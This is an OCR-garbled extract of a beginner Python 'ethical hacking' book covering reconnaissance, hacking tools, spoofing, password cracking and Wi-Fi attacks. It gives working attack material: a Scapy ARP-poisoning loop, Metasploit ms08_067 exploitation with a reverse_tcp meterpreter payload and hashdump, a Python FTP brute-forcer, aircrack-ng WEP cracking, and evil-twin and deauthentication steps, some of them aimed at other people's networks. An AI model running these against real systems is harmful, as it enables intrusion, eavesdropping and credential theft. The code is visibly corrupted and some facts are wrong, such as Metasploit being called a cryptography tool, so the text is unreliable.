constantly connecting
with other people through the network
through messages,
purchases online, uploads, downloads,
and chat and, because of
this, you must learn how to think like a
black hat hacker would
think. Put yourself in their shoes, think of
the motivation that
they have when they attack someone’s
system. If you can do
that, you can understand that there are
plenty of ways that you
can protect your system from
unauthorized attacks and even,
should it be the right thing to do, start a
counter attack.
What You Will Learn Here
This book is going to tell you some of
the ways that you can
use Python to hack your own system and
see where it has weak
points. We will take about hacking in
general, how it all works and how you
can defend your own system against
traps that are laid for every type of user.
You will learn about
hacking networks, mobile devices and
cracking passwords,
how to find or hide an IP address and all
about spoofing and
Man in The Middle attacks. You will
also learn how to get
yourself set up to hack and what tools
you need and I have
thrown in some practical examples for
you to try on your own
system. By the time you are done, you
will be well on your way
to becoming an ethical hacker.
Your biggest concern should be, now
and always, the security
of your own system and your own data
and to learn how and
why an attack goes through all the
different systems, you need
to learn how those attacks are carried
out, how criminal hackers
get into systems by learning the tools of
their trade, the
techniques they use and some of the
attacks. Once you can
understand how a system or device can
be compromised, you will be able to
better arm yourself in your bid to stop
that from
Is Hacking Difficult to Learn?
No. It does require a lot of practice but
it isn’t difficult to learn.
So long as you know how to use your
computer and you are
able to follow simple instructions, you
can test out and perform
the hacks that we will talk about later
on. One thing you do
need is a basic understanding of how to
code in Python and if
you don’t have that yet, you need to go
and learn otherwise you
won’t understand any of what is talked
about later on.
What Skills Do You Need?
In order to become good at ethical
hacking, these are the skills
you must have:
1. Computer skills
To at least intermediate level. You need
to be able to do more
than just create a document in Word or
Excel, more than just be
able to surf the internet. If you want to be
an ethical hacker you
must know about Windows command
lines, how to set up a
network and how to edit the registry
files on your computer.
2. Networking skills
Most hackers carry out their attacks
online and, because of that,
you should learn a number of networking
terms and concepts,
Passwords – WEP vs WPS
MAC Address
Public and private IPs
OSI modeling
You will find all the information you
could possibly need about
all of that online
3. How to use Linux OS
Mot hackers use Linux simply because it
offers a lot more than
Windows or Mac OS in the way of
tweaks and programs. Most
of the hacking tools that you will use
will also make use of
Linux and Python is built into Kali Linux
by default.
4. Virtualization
Before you even think about attacking a
live network or
system, you have to ensure that you know
exactly what you are
doing. That means using virtualization
software like VMWare
Workstation, to test your hacks on first.
This gives you a safe
environment that stops you from causing
unintentional damage
to your system or device.
5. Tcpdump or Wireshark
Wireshark is the most popular sniffer or
protocol analyzer tool
while tcpdump is a command line sniffer
or protocol analyzer.
6. Know-how of technologies and
concepts in
All hackers must be able to grasp the
most important
technologies and concepts surrounding
information technology.
As such, you must familiarize yourself
with wireless concepts
and technology, including:
SSL – Secure Sockets Layer
IDS – Intrusion Detection System
PKI – Public Key Infrastructure
And a lot more besides
7. Scripting skills
If you can create your own scripts and
edit them you can make
your own hacking tools and that gives
you the ability to be
independent, not having to use tools that
other hackers have
developed. If you can create your own
tools, you can arm
yourself better to defend against hackers
who are continually
evolving their own tools. To do this, you
need to learn and
understand Python.
8. Database skills
You also need to have an understanding
of how databases work
if you truly want to understand how a
hacker can get into a system database so
you need to be proficient in MySQL or
Oracle, popular database management
9. Reverse engineering
This is what lets you convert an exploit
or malware into a better
tool for hacking. With this, you can
understand that pretty
much every exploit has evolved from
another exploit that
already exists and, once you have an
understanding of how an
exploit or malware works, you will
better understand how other
hacks will work on a system.
Cryptography skills help you to
understand how a hacker can
cover his or her tracks, concealing what
they have done and
where they have been or come from. It
can also give you an
understanding of the weaknesses and
strengths of the
algorithms used in decrypting data and
information, like stored
passwords. All of this is vital to you
becoming a good ethical hacker and
understanding how a system can be
exploited in order to defend that system
against external threats.

Chapter 2
The first thing you need to do is work
out what your hacking
goals are and, to do this, you have to
find out the vulnerabilities
in your own system so that you can come
up with the correct
security and defense methods to protect
from attack. As you are
going to be up against a dirty, sneaky
kind of enemy, you have
to have very specific goals in mind and
specific schedules on
when to start hacking into your own
When you are testing your own computer
system, you must
document everything you do, every
system you test and what
hacks you carry out on it. Document all
of the software
peripheries that you test and the types of
test. This ensures that you have done
everything properly and, should you
need to go
back for any reason, you can see where
you need to get back to.
When you are able to follow the
necessary security protocols,
you must ask yourself these questions:
1. What system information needs the
Work out which part of your system is
the most important to
you. If you have a lot of personal
information held in databases
or files that contain details of projects,
for example, these are
the bits that need protecting first.
2. What is your budget for ethical
While many of the tools you can use for
ethical hacking are
free, there are some that cost money and
the amount of time
and money you have available will
determine what tools you
can use to protect your system and
research vulnerabilities in
your system.
3. What are you looking to get out of
your tests?
Work out what you are trying to achieve
and write it all down.
This is all a part of your hacking goals
and, before you get into
the actual hacking, you need to
understand what you want to
get out of it.
Mapping Your Hacks
When you are testing for vulnerabilities
on your system, there
is no need to go through every single
security protocol that may
be installed on your devices at the same
time – you would only
get confused. And, it can cause a lot of
problems because you
will be trying to do too much at once.
Wherever you can, break
your testing project down into several
smaller steps to make it
more manageable.
To better determine which systems
should be checked first, ask
these questions:
1. Which systems, if they were attacked,
would have the worst losses or cause the
most amount of trouble? 2. Which bits of
the system look as if they would be more
vulnerable to attack from a hacker?
3. Which bits of the system are
documented the least, not checked very
often or that you know little about?
Now that you have created your goals
and you know which bits
of the system are more vulnerable, you
can determine where to
start with your testing. By knowing what
results you want and
by making a plan, you can set out your
expectations and have a
pretty good idea of how long you need to
be performing your
tests and what resources need to be
expended on each test.
Organize Your Hacking Project
These are the applications, systems, and
devices that your
ethical hacking tests should be
performed upon:

Email servers Print servers

File servers
Database servers Web servers
Application servers
Client/server operating systems
Mobile phones

The number of tests that you do is

dependent on the number of
systems and devices that need testing. If
you only have a small
network, test all peripheries. Hacking is
flexible and should be
dependent on what makes perfect sense
to you and your setup.
If you can’t determine which system or
periphery needs testing
first, consider these factors in your plan:

The operating system or the

applications that run on the system
How much critical information is
stored on your system and how it is
The applications and systems located
on your network

When You Should Begin Hacking

Every successful hack will be based on
your timing, when you
launch that test attack. When you work
out your scheduling,
make sure that your times for launching
attacks are done when
the least disruption will be caused. For
example, if you are
working on a time-critical project, there
is little point in
launching a DoS (Denial of Service)
attack on your system.
Also, the last thing you need is to come
up against system
problems that you don’t have time to
resolve because of other
things that you may be working on. Make
sure you have the
time available to carry out the tests and
resolve the problems
What Others Can See
You can get a much better perspective on
the vulnerabilities on
a system that you are testing by turning it
around and trying to
see what a potential hacker would see.
To do this, you need to see the trails that
are left by your system when your
network is
used. To find that out, you can do this:
1. Run a search online for anything you
can find about you or that is related to

2. Run a probe for potentially open ports

in your system or scan the entire network
to see what system reports others may be
able to see about your network devices.
As you own the system you are going to
test, you can use readily available port
scanner and share-finder tools, such as
GFI or LANGuard
Now that you can see what others may
be able to see about
what you are attempting to protect
online, you can begin to
map the network and look for the
vulnerabilities in your
Network Mapping
When you start to make a plan on how
you are going to carry
out your ethical hacking, one of the very
first things that you
must determine is just how much
outsiders know about your particular
network. Many people think that, when
they are
online, they are completely anonymous.
Unfortunately, your
system, your computer is always leaving
behind footprints, all
of which lead straight back to you and
your system.
To better understand just how much
information about you and
your domain (if you have one) is
publicly available, have a
look at the following:
This is an online tool that helps you to
see if a particular
domain is available. It can also be used
as a tool to look up
information about a domain that already
exists which means
that there is a high chance that your
contact information and
email addresses are already being freely
broadcast on the
Whois can also give you information on
DNS servers that are
in use by your domain and details that
pertain to the tech support system of your
service provider. It also includes a tool
named DNSstuff and that can do the

Display the hosts that are responsible

for email handling on a specific domain
Display the host's location
See if any hosts have been blacklisted
as spam hosts
See generalized information about the
registration of a domain
Google Groups and Forums
Both of these can be home to a
significant amount of
information relating to public networks,
such as usernames, IP
addresses, and lists of FQDNS – Full
Qualified Domain
Names. You can look for Usenet posts
and locate private
information that you weren’t aware had
been posted publicly –
this could include a lot of confidential
stuff that could be
revealing way too much about your
activities on your system
Tip – If you know that there is
confidential information posted
about you online, provided you have the
relevant credentials, you should be able
to get it removed. Contact the admin or
support people of the forum of Group
that has the information
and file a report with them.
Privacy Policies
The privacy policy on a website is there
as a way of informing
people who use the site that some
information is being
collected about and from them and it is
also a way of telling
you how your information is protected
when you go to that site.
However, the one thing a privacy policy
should never do is
divulge any information that could give
potential hackers ideas
on how to get into the system.
If you are building your own website or
trying to hire a person
to write your privacy policy for you,
make sure that you are not
broadcasting your network security
infrastructure. If there is
any information about the security
protocols you use, including firewalls, it
will do nothing but give hackers plenty
of ideas and
clues on how to get into your system.
System Scans
When you have worked out how to
gather information about
your network, you will have a better
idea on how the black hat
hackers can launch attacks against your
network. These are
some of the things you can do to see just
how vulnerable your
system really is:
1. Take the data you gathered from your
internet and
Whois searches and see how related IP
addresses and
host names are laid out. For example,
you could verify
certain information on how operating
protocols, internal
hostnames, open ports, running services
and applications
are displayed on web searches and this
can give you a
good idea of how a system can be
infiltrated. 2. Scan all your internal hosts
to see what rogue users
could access and bear in mind that
attackers can be close
to you, close enough to set up in one of
your hosts and
this can be extremely difficult to see.
3. Check the ping utility on your system
or make use of a
third-party utility that lets you ping
several addresses
simultaneously. Use tools like fping on
Unix, NetScan
Tools, or SuperScan. If you don’t know
what the
gateway IP address of your system is, go
to a website and look for your
public IP
4. Carry out a scan from the outside in
by running a scan
for any open ports. Use NMap or
SuperScan to do this
and then you can check to see what
others see on your
network traffic with Omnipeek or
Wireshark tools.
By doing this, you will get a better idea
of what others can see
when your public IP address is scanned,
allowing them to connect workstations
straight to a switch or hub on the public
side of your router
When all your open ports have been
scanned, you will start to
realize that any outside person who is
sweeping open ports can
find the following information very
Any VPN services that you may be
running, like SL, PPTP,
and IPsec
Any services that may be running on
other ports, like web
servers, email, and database apps
The authentication required for network
Any remote access services that may be
on your systems, such
as Secure Shell, Windows Terminal
Services, VNC or Remote
A Brief Look at System Vulnerabilities
Now that you can see how a hacker can
penetrate your security
system, you can figure out what they may
be targeting on your
computer. If you don’t know about the
different types of
vulnerabilities that exist on most
systems, that information can
be found at the following websites:
US-CERT Vulnerability Notes
Database –
NIST National Vulnerability Database
Common Vulnerabilities and
Exposures –
All of these websites contain
information on all system
vulnerabilities that are known and they
are constantly updated.
This will help you to make the correct
assessment of your
particular system and, once you begin
making that assessment,
you can use all the different tools to
carry out the management
of the vulnerabilities. Depending on
what you find, you can use whatever
information you know about the system
and work out
what kind of attack is most likely to be
launched. These attacks
can do the following:
Capture screen images while you are
looking at
confidential files and information
Gain access to sensitive or valuable
Send emails or files as an
Stop or start certain services and
Get access to a remote command
Get more in-depth information about
data and hosts
Access other systems that may be
Disable logs or security controls
Carry out a DoS attack Carry out
SQL injection
Upload files that broadcast attacks
Now that you know how a hacker may
be able to find the
vulnerabilities in your system and carry
out attacks based on
what they find you can begin to look at
how they get through
your security. In the next chapter, we are
going to look at some of the hacker tools.

Chapter 3
Both black and white hat hackers can
access hundreds of tools
that can be used for the protection of a
system or to attack it.
These tools can be found online, through
hacking hubs and
forums dedicated to hacking. As a new
ethical hacker, you
must learn what the most common tools
are to detect
vulnerabilities, to carry out tests and to
carry out an actual
hack. These are the 8 most popular tools
in use today:
1. ipscan – Angry IP Scanner
Known by both names but more
commonly as ipscan, this is
used to track a computer by its IP
address and to snoop for
ports that may be a gateway straight to a
target system. It is
used mostly by system administrators
and system engineers to check for
potential vulnerabilities in the systems
that they are
carrying out a service on.
This is an open source tool that can be
used on all platforms
and is one of the most efficient hacking
tools available.
2. Kali Linux
First launched back in 2015, Kali is the
favorite tool of a hacker
because it has so many features. We are
going to be using this,
along with Python, to carry out some of
our hacking attacks. It
is a security-centered toolkit that does
not need to be installed
and can be run from USB or from CD.
Kali contains pretty much every
interface you want for hacking
and that includes the ability to create a
fake network crack Wi
Fi passwords and send spoof messages
3. Cain & Abel
Cain & Abel is quite possibly the most
efficient toolkit for
hacking and it works very well against
operating systems. It can help you to
recover a lost Wi-Fi
password, passwords for user accounts
and in some brute force
methods for password cracking. It can
also be used to record
conversations on VoIP systems.
4. Burp Suite
Burp Suite is an essential tool for
mapping website
vulnerabilities. It lets you look at and
examine every single
cookie on a particular website and start
connections inside of
the website applications.
5. Ettercap
Ettercap is one of the most efficient for
launching MiTM
attacks. These attacks are designed to
make two systems think
that they are talking to each other but, in
actual fact, they are both talking to a
middleman who is relaying false
between them. It is efficient at the
manipulation of or theft of
transactions and data transfer that
happens between systems, as
well as eavesdropping on conversations.
6. John the Ripper
John the Riper is the number one brute
force password cracker
available and it uses a dictionary attack.
Most hackers are of
the opinion that brute force attacks take
up too much time, this
tool is one of the most efficient,
especially at recovering
passwords that have been encrypted.
7. Metasploit
Metasploit is one of the most acclaimed
tools among hacker
because if it efficiently at identifying
potential security
problems and to verify the mitigation of
vulnerabilities in a
system. Metasploit is, without a doubt,
also one of the best tools for
cryptography as it can efficiently hide
the identity and
location of an attack.
8. Wireshark and Aircraft-ng
Both of these are used together to find
wireless connections and
to hack user credentials on a wireless
connection. Wireshark is
a packet sniffer and Aircraft-ng is the
capturing suite that lets
you use a lot of other tools to monitor the
security of a Wi-Fi
With all of these tools to hand, you can
now get down to the task of hacking and
to find the vulneraries in your system.

Chapter 4
A good hacker is also a good
investigator or sleuth; he or she
can stay undetected, by staying under the
radar of the network
administrators and they do this by
pretending they are someone
else. To do this, they use what we call
spoofing techniques.
Spoofing is a technique of deception, a
technique whereby a
hacker pretends to be another
organization or person, a website
or a piece of software in order to get
past the security protocols
that protect the information they want.
These are the more
common spoofing techniques:
1. IP Spoofing
This technique is used to mask an IP
address, specifically that
of the computer in use by the hacker, and
it is done to fool the
network into believing that a legitimate
user is in
communication with the target. This is
done by imitating an IP
address or IP range so that the IP criteria
set out by the network
administrator is met.
It works by locating an IP address in use
by a trusted host.
After that, the headers in the packet are
modified to fool the
network into thinking that it comes via an
authorized user. In
this way, harmful packets can be sent to
a network and they
can’t be traced back to you.
2. DNS Spoofing
This works through the use of a website
IP address as a way of
sending a user to a malicious website.
Here, a hacker can easily
get hold of private and confidential
information or user credentials. This is a
MiTM attack that lets you communicate
with a user, making them believe they
have visited a genuine
website that he or she looked for, thus
allowing the hacker to
gain access to all sorts of information
entered by the users.
For this to work, the hacker and the user
must be on the same
LAN and, to gain access to the user’s
LAN, hackers will simply
run searches for weak passwords on
machines connected to the
LAN. That can be done remotely. Once
successful, the hacker
redirects the user to a fake website and
monitors all the activity
on it.
3. Email spoofing
Email spoofing is one of the most useful
techniques to use
when it comes to bypassing security that
is used in email
services. When an email address has
been spoofed, the email
service will see any email sent from it
as real and will not send
it to the spam inbox This allows the
hacker to send malicious
emails and those with dodgy attachments
to a target.
4.Phone number spoofing
This kind of spoofing uses false phone
numbers or area codes
to mask the identity and location of a
hacker. This allows a
hacker to tap into voice mail messages
of their intended target,
to send text messages using a spoofed
number and to falsify
where a phone call comes from. These
are incredibly effective
when it comes to laying the groundwork
for a social
engineering attack.
The level of damage done by spoofing
attacks has the potential
to be high because they are not usually
detected by network
administrators. The worst of it is that the
together with the security protocols, are
what lets these hackers
communicate with users through the
network, able to stop,
inject or manipulate the data stream into
the target system.
Because they can get into a system or
network so easily, the
hacker can then set up a MiTM attack.
Man-in-the-Middle Attacks
A MiTM attack is the logical follow on
from a spoof attack.
While some hackers are perfectly happy
to just look at the data
they need to see and not manipulate it
while eavesdropping on
their target, some want to perform active
attacks straight away
and these are called Man in The Middle
A MiTM attack can be done when a
hacker conducts ARP
spoofing. This is done by sending false
SRP (Address
Resolution Protocol) messages over the
hacked network. When
successful, these ARP messages let a
hacker link their MAC
address with the IP address of a proper
user or to the whole
server of the targeted network. As soon
as the hacker has
linked the MAC address, he can then
receive all the data that is
sent by users over the IP address and,
because he has access to
all the data that the hacked IP address
owner inputs, as well as
the information received, the hacker can
then do the following
in an ARP spoof session: 1. Session
Hijack the hacker can use the false ARP
steal the session ID of a user and then
gain access at a
later date with those credentials.
2. DoS attack this is done at the same
time as the ARP
spoofing so as to link a number of IP
addresses to the
hackers MAC address. All data that is
apparently sent to
the other IP addresses is actually
rerouted to just one
device and that can result in something
called a data
overload, hence the name, Denial of
3. MiTM attack – the hacker is,
effectively, non-existent
on the network but then modifies or
communications between two or more
Let’s have a quick look at how a hacker
could carry out an
ARP spoof to initiate a MiTM attack
with Python.
We are going to use a Python module
called Scapy and our
configuration is set up as this – both the
hackers computer and
the target are on the same network, The hacker’s computer has
an IP address of and a MAC
of 00:14:38:00:0:01. The target
computer has an IP address of and a MAC address of
We begin on the attack computer by
forging an ARP packet to
fool the victim and we do this with
>>> arpFake = ARP()
>>> arpFake.op=2
>>> arpFake.psrc=">
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:14:38:00:00:01 psrc=
hwdst= 00:14:38:00:00:02
The target’s ARP table looks like this
before the packet is sent:
user@victim-PC:/# arp -a
? ( at 00:19:56:00:00:01 [ether] on eth1
attacker-PC.local ( at 00:14:38:00:00:01
[ether] eth1
Once the packet has been sent with
>>> send(arpFake)
The target’s ARP table would look like
user@victim-PC:/# arp -a
? ( at 00:14:38:00:00:01 [ether] on eth1
attacker-PC.local ( at 00:14:38:00:00:01
[ether] eth1
The real problem lies in the fact that, at
some point, the default
gateway is going to send an ARP with
the right MAC address and this means
that the target will no longer be fooled
and their
communications will no longer go via
the hacker. The solution
is in sniffing the communications and,
wherever the default
gateway sends an ARP reply, the hacker
spoofs the target. This
is what the code would look like:
# Import scapy
from scapy.all import *
# Setting variables
# Forge the ARP packet
arpFake = ARP() arpFake.op=2
# While loop to send ARP
# when the cache is not spoofed
while True:
# Send the ARP replies
print "ARP sent"
# Wait for a ARP replies from the default GW
sniff(filter="arp and host", count=1)
For this script to be run successfully you
must save it as a
Python file and run it using administrator
That is how an ARP table can be
spoofed. Now,
communication from the target to the
network outside of passes
via the hacker, going to the default
first. However, communication from the
default gateway to the
target will always go straight to the
target because we haven’t
spoofed the ARP table of the default
gateway. The following
script does both:
# Import scapy
from scapy.all import *
# Setting variables
# Forge the ARP packet for the victim
arpFakeVic = ARP() arpFakeVic.op=2
# Forge the ARP packet for the default GW
arpFakeDGW = ARP()
# While loop to send ARP
# when the cache is not spoofed
while True:
# Send the ARP replies
print "ARP sent" # Wait for a ARP replies from the
default GW
sniff(filter="arp and host or host", count=1)
Now we have done the ARP spoof, if
you were to browse
through a website with the target’s
computer, the connection
would likely be blocked. The reason for
this is that computers
don’t tend to forward packets unless the
IP address matches the
destination IP address.
Later I will go over MiTM attacks again
with another practical example for you
to do

Chapter 5
Passwords are the most common target
because hacking a
password is the easiest of hacking tricks
to do. While many
people believe that creating a long
password or passphrase
makes it harder to hack, the hackers are
well aware that the one
thing users neglect is the protection of
their credentials.
Confidential information, like
passwords, are some of the
weakest links when it comes to security
because it is a future
that relies purely on secrecy. Once that
secret is out,
accountability disappears and systems
can be compromised in
an instant.
If you get yourself into the mind of a
hacker, you might just
realize that there are loads of ways to
work out what a password is because it
is incredibly vulnerable. The biggest
issue of relying on just a password as a
form of security is that,
on more occasions than not, a user will
give his information to
another user. While he or she may do
this intentionally or
unintentionally, as soon as that password
is known by another
person, you have no way of knowing just
how many other
people will now about it. At this stage,
you should know that,
when one person knows what another
person’s password is, it
doesn’t mean that they are an authorized
user on the network.
How to Crack a Password
If a hacker doesn’t gain passwords
through inference, physical
attacks or social engineering, there are a
number of password
cracker tools that he or she can use.
These are the best ones:
Cain & Abel – cracks NTLM
LanManager hashes,
Cisco IOS and Pic hashes, windows
RDP passwords and
Radius hashes
Elcomsoft Distributed Password
Recovery – Cracks
Microsoft Office, PKCS, and PGP
passwords as well as
distributed passwords and can recover
more than 10,000
networked computers. It uses a GPU
accelerator that
increases the speed of cracking up to 50
Elcomsoft System Recovery – this
will reset a
Windows password, reset expirations on
all passwords
and can set admin credentials
John the Ripper – can crack Unix,
Linux and Windows
hashed passwords
Ophcrack – uses rainbow tables to
crack passwords for
Windows OS
Pandora – can crack online or offline
user passwords
for all Novell Netware accounts
Proactive System Password Recovery
– can recover
any password that has been locally
stored on Windows, including VPN,
logins, RAS, WEP, WPA, and
RainbowCrack – can crack
LanManager and MD5
hashes by using the rainbow table
Do be aware that some tools require you
to have physical
access to the target system and, in the
same way, bear in mind
that, once you have physical access to a
system that you are
aiming to protect, you can get into all the
files that are
encrypted or password-protected, so
long as you have the right
tools for the job.
When you test out some of the password
cracking tactics, you
must remember that the technique you
use will need to be
based on the encryption type of the
password you want to
crack. And, if you are testing out these
hacks, you should also
keep in mind that some systems can lock
associated users out
and this can cause a DoS attack on
network users.
Password Encryption
Once a password has been created, it is
then encrypted with a
one-way hash algorithm, which would
be seen as an encrypted
string. Obviously, these hashes cannot be
reversed and this is
what makes a password impossible to
decrypt. If you are
looking to crack passwords stored on a
Linux system, there is a
little more difficulty. This is because
Linux randomizes
passwords by adding “salt” or some
other random value that
makes passwords unique and stops two
users from being given
the same hash value.
That said, with the right tools, you can
launch a number of
attacks to try recovering or cracking
passwords and here are a
few of them:
1. Dictionary attacks
The name itself implies that these attacks
use words that in a
dictionary to test against the hashes on a
system password database. Using a
dictionary attack, you can find weak
passwords or those that use alternative
characters in their
spellings, such as “pa$$word” instead
of “password”. The
strength of this type of attack lies in the
sheer amount of words
contained in the dictionary
2. Brute-force attacks
Brute-force attacks can crack just about
any password type
because they will use all combinations
of numbers, letters, and
characters until a password has been
cracked successfully.
However, there is a flaw in this
technique – it can take a very
long time to crack a password,
especially if it is a strong one.
3. Rainbow Attacks
Rainbow attacks are used to crack
hashed passwords and can
be highly successful. Tools that use
rainbow attacks are also
able to crack a lot faster compared to the
previous types of attack. The only
downside to a rainbow attack is that it
can only
crack a password that is 14 characters
or lower.
Other Ways to Crack Passwords
Obviously, the easiest way to crack
passwords is if you have
physical access to the target system but,
if you haven’t or you
can’t use cracking tools on a specific
system, you can try these
1. Keystroke logging
This is the most efficient way of
cracking a password as it uses
some kind of recording devices that logs
every keystroke on a
2. Looking for weak password storage
There are an awful lot of applications
that will store passwords
locally and that makes then highly
vulnerable to being hacked.
As soon as you gain physical access to
the target computer, you can find the
passwords by running a search for
in storage or using text searches.
3. Grab passwords remotely
If you can’t get physical access to a
system, you can grab these
locally stored passwords on Windows
from remote locations,
even the credentials of the system
administrator. To do this,
you must first initiate a spoofing attack
and then exploit the
SAM file, found in the registry of the
target. Here’s how to do
Open Metasploit and type in this
command: msf > use
Now, type in this command: msf
(ms08_067_netapi) >
set payload /windows/meterpreter/reverse_tcp
Metasploit will now tell you that you
have to have the IP
address of the target (RHOST) and the
IP address from the device that you have
used (LHOST). If you have those to
you can use these commands to set up the
exploit IP addresses:
msf (ms08_067_netapi) > set RHOST [target IP
msf (ms08_067_netapi) > set LHOST [your IP
Now type in this command to carry
out the exploit:
msf (ms08_067_netapi) > exploit
This provides you with a terminal
prompt that then allows you
to gain remote access to a target
4. Grab the password hash
Most applications and operating systems
will store passwords
in hashes and this is for the purposes of
encryption. Because of
this, there is a chance that you won’t see
the passwords you are
looking for right away but you can get
them and then interpret
them when you are ready. To grab the
hashes, type in this
meterpreter > hashdump
Now you will be shown all the users that
are on the system you
are targeting, along with the password
hashes Use something
like Cain & Abel to try decrypting these
passwords. Do this on
your own system and you will see where
the weaknesses lie in
your own passwords, allowing you to
make the necessary
Creating an FTP Password Cracker
Let’s look at how to create an FTP
password cracker using
Python. First, open a text editor in kali
and type in the script
#! /usribin/python
import socket
import re
import sys def connect(username, password):
s = socket.socket(socket.AF_INET,
print "(*) Trying "+ username + ":" + password
s,connect(('', 21))
data = s.recv(1024)
s.send('USER ' + username + Ar\n')
data = s.recv(1024)
s.send('PASS ' + password + '\r\n')
data . s.recv (3)
return data
username = "NuilByte"
passwords =["test", "backup", "password", "12345",
"root", "administrator", "ftp", "adminl
for password in passwords:
attempt = connect(username, password) if
print "[*) Password found: "+ password
Note that we have imported the modules,
sys, re and socket and
then created a socket that tries to connect
to a specific IP
address through port 21. Then a variable
username is created,
assigned to “NullByte” and a list called
“passwords” is created.
This contains possible passwords; a for
loop is then created to
try every password until it is successful
or it goes through the
entire password list without success.
You can, if you want, change the values
that we have used in
the script to whatever you want and to
whatever fits your
circumstances. Save your script as
“”, make sure
you have execute permission and run it
against an FTP server.
If the password is found, you will get
“Password found: <password> “(Line

Chapter 6
One of the favorite pastimes of a hacker
is to hack into network
connections and, by doing this, they are
able to hide their
identity, use someone else’s connection
for illegal purposes and
gain access to more bandwidth for large
downloads free. It also
lets them decrypt traffic on the network.
You can imagine the
problems a hacker could cause if he or
she could get into your
Wi-Fi connection and what the potential
repercussions are for
Before you try to hack a network
connection you must first
have a thorough understanding of
privacy levels when it comes
to the protection of your own connection.
The attack level that
you need to test will depend
significantly on the security level of the
target network connection. These are
some of the more
basic protocols that are found on
wireless connections:
1. WEP (Wired Equivalent Privacy)
This provides a user with the encryption
level of a wired
connection. Unfortunately, these are very
easy to crack open
because there is a small initialization
vector that a hacker can
easily catch in the data stream. This
encryption type is usually
used in older wireless connections and
devices that have not
been upgraded to take the higher security
2. WPA (WPA1)
This type of security protocol was made
to address any
weaknesses that may be present in WEP
encryption. It uses the
TKIP – Temporal Key Integrity Protocol
– to improve the
security in WEP without needing a user
to install any new
hardware. What this means is that this
type of technology will
still use WEP security but is harder to
This type of security protocol tends to be
used by small
business and private home users. It uses
a PSK – pre-shared
key – and, although it is more secure
than the two we talked
about before, it is still open to hacking.
The enterprise WPA protocol version,
this one uses AES –
Advanced Encryption Standard – as a
way of encrypting the
data. When an organization uses AES
security, it will most
likely also come with a RADIUS server
to provide extra
authentications. It is possible to crack
this kind of
authentication but it isn’t so easy.
Hacking a WEP Connection
Here, we are going to look at how to
hack a low-security
connection. For this, you will need:
Wireless adaptor
When you have these to hand, here’s
how to do it:
1. Load aircrack-ng in Backtrack
When you have opened BackTrack,
connect your wireless
adapter and make sure it is running. To
do that, type this in at
the command prompt:
When you have done that, you should be
able to see if your
adapter has been recognized – you might
see wlan0, wlan1,
wlan2, etc.
2. Place your wireless adapter into
Now you can run a search for nearby
connections that are
available. Do this by placing the adapter
into monitor or
promiscuous mode – to do that, you
should type in this
airmon-ng start wlan0
airmon-ng will now change your
interface name to mon0.
When your wireless adaptor has been
placed into the mode, you
can capture all the traffic on the network
by typing in this
airodump-ng mon0
Now you should be able to see all the
access points that are in
range along with their corresponding
3. Start capturing on a specific access
If you see an ESSID or a BSSID
encrypted by WEP, you know
that you should be able to crack this
quite easily so look down
the list of access points you captured and
see what is there. For
your chosen access point, copy the
BSSID and type in the
following command to start capturing:
airodump-ng --bssid [BSSID of target] -c [channel
number] -w WEPcrack mon0
When the command has been entered,
BackTrack will begin to
capture packets for your chosen access
point in its channel and
will then write WEPcrack in pcap
format. This lets you get
hold of all the packets that you require to
decode the passkey
that is in use in your target connection.
That said, getting
sufficient packets to do the encryption
can take some time and
if you don’t have that time you will need
to inject ARP traffic.
4. Inject ARP Traffic
Capture an ARP packet and reply it
several times to get all of
the IVs that you need to crack WEP key.
You already have the
BSSID and you have the MAC address f
your target so type in
this command:
aireplay-ng -3 -b [BSSID] -h [MAC address] mon0
now you can inject the ARPs you
captured straight into the
access point you targeted. All you must
do now is capture all
the IVs generated right in the airodump
5. Crack the WEPkey
As soon as you have sufficient IVs in
WEPcrack, you can run
the file using aircrack-ng and, to do that,
you would type this
command in:
aircrack-ng [name of file, ecample:WEPcrack-01.cap]
aircrack-ng will normally display the
passkey in hexadecimal
format and all you must do is apply the
key to the remote
access point, giving you completely free
With Python
You can do something similar using
Python and here’s what
you will need:
Python 3 or higher
A decent Wi-Fi adaptor
Python package “csvsimple:”
While you can run this script without a
graphical environment,
you should try to run it using Lxde.
The script can be adapted to use other
graphical environments
and, to do that, you would edit file
“bin/” and then
change the “launchTerminal(…)”
function. You can do that by
adapting this line:
command = ['lxterminal', '--working-directory=%s' %
WORKING_DIR, '-e', " ".join(in_command)]

Navigate to “bin” directory

Edit “” and set the following
variables: o WI: your Wi-Fi interface

o WI_REAL_MAC: the proper MAC

address of your interface
o WORKING_DIR: the path to the
directory that is used for saving working
o AIRODUMP_PREFIX: the prefix that
is used with “airodump-ng". you may
leave “out”
o DUMP_DURATION: the duration in
seconds for the first scan

How to Use

Look for “ENV.SH

Go into “bin” directory
Run “python”
"Source" the file "ENV.SH" (.
ENV.SH). Move into the directory
Run "python".

Evil Twin
A lot of hackers use Wi-Fi hacks to get
free bandwidth but
there are hacks on network connections
that are a lot more
powerful and provide far better access
than just free internet.
One of this is the Evil Twin access
This is a manipulative AP that looks and
behaves just like a
normal access point, one that a user
would connect to so that
they could connect to the internet.
However, these are used by
hackers to reroute a user to their own
access point, allowing
them to see all the traffic that comes in
from the client. This
can lead to extremely dangerous MiTM
This is how to do an Evil Twin access
point attack (please note
that I am not showing you this for
malicious purposes, only so
that you can see how it is done!) 1. Open
Backtrack and start airmon-ng.
Make sure the wireless card in enabled
and running; type this
command in:
bt > iwconfig
2. Place the wireless card into
“monitor” mode
3. As soon as you see that your wireless
card has been
recognized in BackTrack, put it in
monitor mode by
typing in this command:
bt >airmon-ng start wlan0
4. Start up airdump-ng
Begin to capture all wireless traffic that
is detected by the card
by typing in this command:
bt > airodump-ng mon0
When you have done that, you can see all
access points that are
within range so find the access point of
your target 5. Wait for your target to
When your target has connected to the
AP, you can copy both
the MAC address and BSSID of the
intended target system.
6. Create an access point with those
Open terminal and type in the following
bt > airbase-ng -a [BSSID] --essid ["SSID of target"]
c [channel number] mon0
This creates the access point or, in this
case, Evil twin, that
your target is going to connect to
7. Deauthenticatethe target
For your target to connect to your Evil
Twin, you must get him
off the access point he already connected
to. As most wi-fi
connections adhere strictly to 802.11,
which has a
deauthentication protocol, the target’s
access point will
automatically deauthenticate anyone
connected. When your target’s computer
attempts to reconnect, it will
go to the one that has the strongest signal
and that will be the
Evil Twin. To do that, you must use this
bt > aireplay-ng --deauth 0 -a [BSSID of target]
8. Turn the Evil Twin signal up
This is important – you have to make
sure that the Evil Twin
AP you created is the same strength or
higher than the original
AP. As you are attacking remotely, you
can pretty much work
